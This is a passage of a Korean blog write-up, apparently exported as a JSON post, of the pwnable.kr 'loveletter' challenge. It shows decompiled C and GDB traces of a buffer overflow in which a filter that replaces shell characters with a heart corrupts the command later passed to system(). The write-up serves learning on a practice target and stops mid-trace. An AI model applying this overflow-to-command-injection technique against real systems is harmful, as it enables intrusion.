{"id":3280,"date":"2025-04-10T19:12:24","date_gmt":"2025-04-10T10:12:24","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3280"},"modified":"2025-04-10T19:12:25","modified_gmt":"2025-04-10T10:12:25","slug":"loveletter","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3280","title":{"rendered":"loveletter"},"content":{"rendered":"\n

Description<\/h1>\n\n\n\n
At the end... all that matters is love.\nauthor: Jiwon Choi\n\nssh loveletter@pwnable.kr -p2222 (pw:guest)<\/pre>\n\n\n\n
Decompiled src<\/h1>\n\n\n\n
    \n
  • protect<\/li>\n<\/ul>\n\n\n\n
    a1<\/code>\uc5d0 \"#&;<\/code>‘\\”|*?~<>^()[]{}$\\\\,”` \ud2b9\uc218 \ubb38\uc790 \uc911 \ud558\ub098\uac00 \uc788\uc73c\uba74, \uadf8 \ub4a4\uc5d0 \uc774\uc5b4\uc9c0\ub294 \ubb38\uc790\uc5f4\uc744 \ub530\ub85c \ube7c\uace0, \uc6d0\ub798 \ubb38\uc790\uc5f4\uc744 \u2665\ub85c \uc798\ub77c\ub0b4\uace0 \ub2e4\uc2dc \ubd99\uc778\ub2e4.<\/p>\n\n\n\n
    unsigned int __cdecl protect(const char *a1)\n{\n  size_t i; \/\/ eax\n  size_t v2; \/\/ esi\n  size_t v3; \/\/ eax\n  size_t v5; \/\/ [esp+1Ch] [ebp-12Ch]\n  size_t j; \/\/ [esp+20h] [ebp-128h]\n  char v7[279]; \/\/ [esp+25h] [ebp-123h] BYREF\n  unsigned int v8; \/\/ [esp+13Ch] [ebp-Ch]\n\n  v8 = __readgsdword(0x14u);\n  strcpy(v7, \"#&;`'\\\"|*?~<>^()[]{}$\\\\,\");\n  v5 = 0;\n  for ( i = strlen(a1); i > v5; i = strlen(a1) )\n  {\n    for ( j = 0; strlen(v7) > j; ++j )\n    {\n      if ( a1[v5] == v7[j] )\n      {\n        strcpy(&v7[23], &a1[v5 + 1]);\n        *(_DWORD *)&a1[v5] = 0xA599E2;          \/\/ \u2665\n        v2 = strlen(&v7[23]);\n        v3 = strlen(a1);\n        memcpy((void *)&a1[v3], &v7[23], v2);\n      }\n    }\n    ++v5;\n  }\n  return v8 - __readgsdword(0x14u);\n}<\/pre>\n\n\n\n
      \n
    • main<\/li>\n<\/ul>\n\n\n\n
      \uc0ac\uc6a9\uc790\uc5d0\uac8c \u201clover\u2019s name\u201d\uc744 \ubb3c\uc5b4\ubcf4\uace0 fgets<\/code>\ub85c \uc77d\ub294\ub2e4.<\/p>\n\n\n\n
      fgets<\/code>\uac00 \ub0a8\uae30\ub294 '\\\\n'<\/code>\uc744 0<\/code>\uc73c\ub85c \ub36e\uc5b4\uc368\uc11c \ubb38\uc790\uc5f4 \ub05d\uc744 \uc815\ub9ac\ud55c\ub2e4.<\/p>\n\n\n\n
      protect(s)<\/code>\ub97c \ud638\ucd9c\ud574 \uc774\ub984\uc5d0 \ud3ec\ud568\ub41c \uc258 \ud2b9\uc218\ubb38\uc790\ub97c \ubaa8\ub450 \ud558\ud2b8(\u2665)\ub85c \uce58\ud658\ud55c\ub2e4.<\/p>\n\n\n\n
      prolog<\/code> + (\ud558\ud2b8\ub85c \ud544\ud130\ub9c1\ub41c)\uc774\ub984<\/code> + epilog<\/code> \uc21c\uc73c\ub85c loveletter<\/code> \ubcc0\uc218\uc5d0 \ubcf5\uc0ac\ud558\uace0 system(loveletter)<\/code>\uc744 \ud638\ucd9c\ud55c\ub2e4.<\/p>\n\n\n\n
      int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __gid_t v3; \/\/ esi\n  __gid_t v4; \/\/ eax\n  int v6; \/\/ [esp+0h] [ebp-12Ch]\n  char s[256]; \/\/ [esp+4h] [ebp-128h] BYREF\n  size_t n; \/\/ [esp+104h] [ebp-28h]\n  size_t v9; \/\/ [esp+108h] [ebp-24h]\n  size_t v10; \/\/ [esp+10Ch] [ebp-20h]\n  unsigned int v11; \/\/ [esp+110h] [ebp-1Ch]\n  int *p_argc; \/\/ [esp+120h] [ebp-Ch]\n\n  p_argc = &argc;\n  HIBYTE(v6) = HIBYTE(argv);\n  v11 = __readgsdword(0x14u);\n  memset(loveletter, 0, sizeof(loveletter));\n  v9 = strlen(epilog);\n  n = strlen(prolog);\n  printf(\"\u2665 My lover's name is : \");\n  fgets(s, 256, stdin);\n  if ( s[strlen(s) - 1] == 0xA )\n    s[strlen(s) - 1] = 0;\n  puts(\"\u2665 Whatever happens, I'll protect her...\");\n  protect(s);\n  v10 = strlen(s);\n  puts(\"\u2665 Impress her upon my memory...\");\n  memcpy(&loveletter[(unsigned __int16)idx], prolog, n);\n  idx += n;\n  memcpy(&loveletter[(unsigned __int16)idx], s, v10);\n  idx += v10;\n  memcpy(&loveletter[(unsigned __int16)idx], epilog, v9);\n  idx += v9;\n  puts(\"\u2665 Her name echos in my mind...\");\n  v3 = getegid();\n  v4 = getegid();\n  setregid(v4, v3);\n  system(loveletter);\n  return 0;\n}<\/pre>\n\n\n\n
      Analysis<\/h1>\n\n\n\n
      \uc5b8\ub73b\ubcf4\uae30\uc5d4 fgets<\/code>\ub97c \ud1b5\ud574 256\ubc14\uc774\ud2b8\ub9cc \uc785\ub825\ubc1b\uae30\uc5d0 \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0\uac00 \ubc1c\uc0dd\ud558\uc9c0 \uc54a\uc740 \uac83\ucc98\ub7fc \ubcf4\uc774\uc9c0\ub9cc,<\/p>\n\n\n\n
      int __cdecl main(int argc, const char **argv, const char **envp)\n{\n...\n  char s[256]; \/\/ [esp+4h] [ebp-128h] BYREF\n...\n  fgets(s, 256, stdin);\n...\n}<\/pre>\n\n\n\n
      protect<\/code> \ud568\uc218\uc5d0\uc11c \ud2b9\uc218\ubb38\uc790\ub4e4 \uc911 \ud558\ub098\uac00 \ud3ec\ud568\ub418\uba74 \ud2b9\uc218 \ubb38\uc790 1\ubc14\uc774\ud2b8\uac00 4\ubc14\uc774\ud2b8\uc529\uc774\ub098 \ucc28\uc9c0\ud558\ub294 \ub9c8\ubc95\uc744 \ubcfc \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
      unsigned int __cdecl protect(const char *a1)\n{\n...\n  strcpy(v7, \"#&;`'\\\"|*?~<>^()[]{}$\\\\,\");\n...\n      if ( a1[v5] == v7[j] )\n      {\n        strcpy(&v7[23], &a1[v5 + 1]);\n        *(_DWORD *)&a1[v5] = 0xA599E2;          \/\/ \u2665\n        v2 = strlen(&v7[23]);\n        v3 = strlen(a1);\n        memcpy((void *)&a1[v3], &v7[23], v2);\n      }\n    }\n...\n}<\/pre>\n\n\n\n
      \ub530\ub77c\uc11c fgets<\/code>\ub97c \ud1b5\ud574 \uc785\ub825\ud560\ub54c A<\/code> \ubb38\uc790 253<\/code>\uac1c \ub123\uace0 \ud2b9\uc218\ubb38\uc790 ;<\/code>\uc744 \ub123\uc73c\uba74, 0xffffd5c0<\/code> \uc8fc\uc18c\uc5d0\ub294 0xc<\/code> , n = strlen(prolog);<\/code> \uac12\uc774 \ub4e4\uc5b4\uac04\ub2e4.<\/p>\n\n\n\n
      Breakpoint 7, 0x0804928c in protect ()\n\n[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$eax   : 0x0       \n$ebx   : 0x0804c000  \u2192  0x0804bf10  \u2192  <_DYNAMIC+0000> add DWORD PTR [eax], eax\n$ecx   : 0xf7fae9b4  \u2192  0x00000000\n$edx   : 0x1       \n$esp   : 0xffffd350  \u2192  0xf7e08e5b  \u2192   add ebx, 0x1a41a5\n$ebp   : 0xffffd498  \u2192  0xffffd5e8  \u2192  0xf7ffd020  \u2192  0xf7ffda40  \u2192  0x00000000\n$esi   : 0xffffd6b4  \u2192  0xffffd7f8  \u2192  \"\/home\/ubuntu\/pwnable.kr\/loveletter\/loveletter\"\n$edi   : 0xf7ffcb80  \u2192  0x00000000\n$eip   : 0x0804928c  \u2192  <protect+0076> jmp 0x804936d <protect+343>\n$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]\n$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0xffffd350\u2502+0x0000: 0xf7e08e5b  \u2192   add ebx, 0x1a41a5\t \u2190 $esp\n0xffffd354\u2502+0x0004: 0xf7ffdc0c  \u2192  0xf7ffdba0  \u2192  0xf7fbe780  \u2192  0xf7ffda40  \u2192  0x00000000\n0xffffd358\u2502+0x0008: 0xffffd3d4  \u2192  0x0804d1a0  \u2192  0x20a599e2\n0xffffd35c\u2502+0x000c: 0xffffd4c0  \u2192  \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n0xffffd360\u2502+0x0010: 0x08048335  \u2192  \"puts\"\n0xffffd364\u2502+0x0014: 0xf7fd0294  \u2192   add esp, 0x30\n0xffffd368\u2502+0x0018: 0x0804828c  \u2192  0x00000029 (\")\"?)\n0xffffd36c\u2502+0x001c: 0x00000000\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:32 \u2500\u2500\u2500\u2500\n    0x8049272 <protect+005c>   mov    WORD PTR [ebp-0x10f], 0x2c5c\n    0x804927b <protect+0065>   mov    BYTE PTR [ebp-0x10d], 0x0\n    0x8049282 <protect+006c>   mov    DWORD PTR [ebp-0x12c], 0x0\n \u2192  0x804928c <protect+0076>   jmp    0x804936d <protect+343>\n    0x8049291 <protect+007b>   mov    DWORD PTR [ebp-0x128], 0x0\n    0x804929b <protect+0085>   jmp    0x8049346 <protect+304>\n    0x80492a0 <protect+008a>   mov    edx, DWORD PTR [ebp-0x12c]\n    0x80492a6 <protect+0090>   mov    eax, DWORD PTR [ebp-0x13c]\n    0x80492ac <protect+0096>   add    eax, edx\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"loveletter\", stopped 0x804928c in protect (), reason: BREAKPOINT\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n[#0] 0x804928c \u2192 protect()\n[#1] 0x80494b0 \u2192 main()\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  x\/wx $ebp-0x13c\n0xffffd35c:\t0xffffd4c0\ngef\u27a4  x\/70wx 0xffffd4c0\n0xffffd4c0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd4d0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd4e0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd4f0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd500:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd510:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd520:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd530:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd540:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd550:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd560:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd570:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd580:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd590:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd5a0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd5b0:\t0x41414141\t0x41414141\t0x41414141\t0x00003b41\n0xffffd5c0:\t0x0000000c\t0x0000000b\t0xf7d9f4be\t0xb3c9a000\n0xffffd5d0:\t0xffffd610\t0xf7fbe66c<\/pre>\n\n\n\n
      \uadf8\ub7ec\ub098 \uce58\ud658\ub418\ub294 4\ubc14\uc774\ud2b8 \uac12\uc5d0 \uc758\ud574, n<\/code> \uac12\uc744 0\uc73c\ub85c \ub9cc\ub4e4\uc5b4\uc904 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
      Breakpoint 6, 0x0804933c in protect ()\n\n[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$eax   : 0xffffd5c0  \u2192  0x00000000\n$ebx   : 0x0804c000  \u2192  0x0804bf10  \u2192  <_DYNAMIC+0000> add DWORD PTR [eax], eax\n$ecx   : 0x0       \n$edx   : 0x0       \n$esp   : 0xffffd340  \u2192  0xffffd5c0  \u2192  0x00000000\n$ebp   : 0xffffd498  \u2192  0xffffd5e8  \u2192  0xf7ffd020  \u2192  0xf7ffda40  \u2192  0x00000000\n$esi   : 0x0       \n$edi   : 0xf7ffcb80  \u2192  0x00000000\n$eip   : 0x0804933c  \u2192  <protect+0126> add esp, 0x10\n$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]\n$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0xffffd340\u2502+0x0000: 0xffffd5c0  \u2192  0x00000000\t \u2190 $esp\n0xffffd344\u2502+0x0004: 0xffffd38c  \u2192  0xf7e8f600  \u2192  <read+0090> mov edx, DWORD PTR [esi-0x134]\n0xffffd348\u2502+0x0008: 0x00000000\n0xffffd34c\u2502+0x000c: 0x08049226  \u2192  <protect+0010> add ebx, 0x2dda\n0xffffd350\u2502+0x0010: 0xf7e08e5b  \u2192   add ebx, 0x1a41a5\n0xffffd354\u2502+0x0014: 0xf7ffdc0c  \u2192  0xf7ffdba0  \u2192  0xf7fbe780  \u2192  0xf7ffda40  \u2192  0x00000000\n0xffffd358\u2502+0x0018: 0xffffd3d4  \u2192  0x0804d1a0  \u2192  0x20a599e2\n0xffffd35c\u2502+0x001c: 0xffffd4c0  \u2192  \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:32 \u2500\u2500\u2500\u2500\n    0x8049335 <protect+011f>   push   eax\n    0x8049336 <protect+0120>   push   edx\n    0x8049337 <protect+0121>   call   0x8049060 <memcpy@plt>\n \u2192  0x804933c <protect+0126>   add    esp, 0x10\n    0x804933f <protect+0129>   add    DWORD PTR [ebp-0x128], 0x1\n    0x8049346 <protect+0130>   sub    esp, 0xc\n    0x8049349 <protect+0133>   lea    eax, [ebp-0x123]\n    0x804934f <protect+0139>   push   eax\n    0x8049350 <protect+013a>   call   0x80490d0 <strlen@plt>\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"loveletter\", stopped 0x804933c in protect (), reason: BREAKPOINT\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n[#0] 0x804933c \u2192 protect()\n[#1] 0x80494b0 \u2192 main()\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  x\/70wx 0xffffd4c0\n0xffffd4c0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd4d0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd4e0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd4f0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd500:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd510:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd520:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd530:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd540:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd550:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd560:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd570:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd580:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd590:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd5a0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\n0xffffd5b0:\t0x41414141\t0x41414141\t0x41414141\t0xa599e241\n0xffffd5c0:\t0x00000000\t0x0000000b\t0xf7d9f4be\t0xb3c9a000\n0xffffd5d0:\t0xffffd610\t0xf7fbe66c<\/pre>\n\n\n\n
      main\uc73c\ub85c \ubcf5\uadc0\ud588\uc744\ub54c\ub3c4 main\uc758 n<\/code>\uc740 [ebp-28h]<\/code> \uc704\uce58\uc5d0 \uc788\ub294\ub370, 0\uc73c\ub85c \ub36e\ud78c\ub2e4.<\/p>\n\n\n\n
      [ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$eax   : 0xffffd4c0  \u2192  \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n$ebx   : 0x0804c000  \u2192  0x0804bf10  \u2192  <_DYNAMIC+0000> add DWORD PTR [eax], eax\n$ecx   : 0x0       \n$edx   : 0x100     \n$esp   : 0xffffd4a0  \u2192  0xffffd4c0  \u2192  \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n$ebp   : 0xffffd5e8  \u2192  0xf7ffd020  \u2192  0xf7ffda40  \u2192  0x00000000\n$esi   : 0xffffd6b4  \u2192  0xffffd7f8  \u2192  \"\/home\/ubuntu\/pwnable.kr\/loveletter\/loveletter\"\n$edi   : 0xf7ffcb80  \u2192  0x00000000\n$eip   : 0x080494bd  \u2192  <main+0118> call 0x80490d0 <strlen@plt>\n$eflags: [zero carry parity ADJUST SIGN trap INTERRUPT direction overflow resume virtualx86 identification]\n$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0xffffd4a0\u2502+0x0000: 0xffffd4c0  \u2192  \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\t \u2190 $esp\n0xffffd4a4\u2502+0x0004: 0x00000100\n0xffffd4a8\u2502+0x0008: 0xf7fad620  \u2192  0xfbad2288\n0xffffd4ac\u2502+0x000c: 0x080493c0  \u2192  <main+001b> add ebx, 0x2c40\n0xffffd4b0\u2502+0x0010: 0xf7fc6460  \u2192  0x00000000\n0xffffd4b4\u2502+0x0014: 0xf7ffd000  \u2192  0x00036f2c\n0xffffd4b8\u2502+0x0018: 0xf7fc6700  \u2192  0x74725f00\n0xffffd4bc\u2502+0x001c: 0xffffd6b4  \u2192  0xffffd7f8  \u2192  \"\/home\/ubuntu\/pwnable.kr\/loveletter\/loveletter\"\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:32 \u2500\u2500\u2500\u2500\n    0x80494b3 <main+010e>      sub    esp, 0xc\n    0x80494b6 <main+0111>      lea    eax, [ebp-0x128]\n    0x80494bc <main+0117>      push   eax\n \u2192  0x80494bd <main+0118>      call   0x80490d0 <strlen@plt>\n   \u21b3   0x80490d0 <strlen@plt+0000> jmp    DWORD PTR ds:0x804c030\n       0x80490d6 <strlen@plt+0006> push   0x48\n       0x80490db <strlen@plt+000b> jmp    0x8049030\n       0x80490e0 <memset@plt+0000> jmp    DWORD PTR ds:0x804c034\n       0x80490e6 <memset@plt+0006> push   0x50\n       0x80490eb <memset@plt+000b> jmp    0x8049030\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 arguments (guessed) \u2500\u2500\u2500\u2500\nstrlen@plt (\n   [sp + 0x0] = 0xffffd4c0 \u2192 \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n)\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"loveletter\", stopped 0x80494bd in main (), reason: BREAKPOINT\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace 